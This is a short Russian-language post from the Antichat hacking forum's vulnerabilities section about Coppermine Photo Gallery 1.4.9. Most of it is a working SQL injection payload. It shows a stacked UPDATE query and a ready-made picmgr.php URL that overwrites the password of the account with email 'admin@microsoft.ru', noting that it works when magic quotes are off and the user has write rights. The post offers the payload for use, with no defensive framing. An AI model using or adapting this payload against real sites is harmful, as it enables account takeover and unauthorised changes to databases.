Coppermine Photo Gallery 1.4.9

FORUMS

MEMBERS

RECENT POSTS

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Coppermine Photo Gallery 1.4.9

28.07.2007, 21:29

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

С нами: 10516826

Репутация: 3742

зависит от того есть ли мэджик квоутс и есть ли права у юзера для апйдета-инзерта
а вообще вид запроса такой

Код:

select * from sometable 
where ='x';
      UPDATE user
      SET pass = '31337'
      WHERE email = 'admin@microsoft.ru';

то есть ./picmgr.php?aid=31337';UPDATE+user+SET+pass='31337' +WHERE+email='admin@microsoft.ru';

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Coppermine Photo Gallery vX.X.X<=1.4.10	fly	Уязвимости	2	21.04.2007 18:21
инекция в Coppermine Photo Gallery 1.4.8	ufo44	Уязвимости	1	22.11.2006 11:36

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home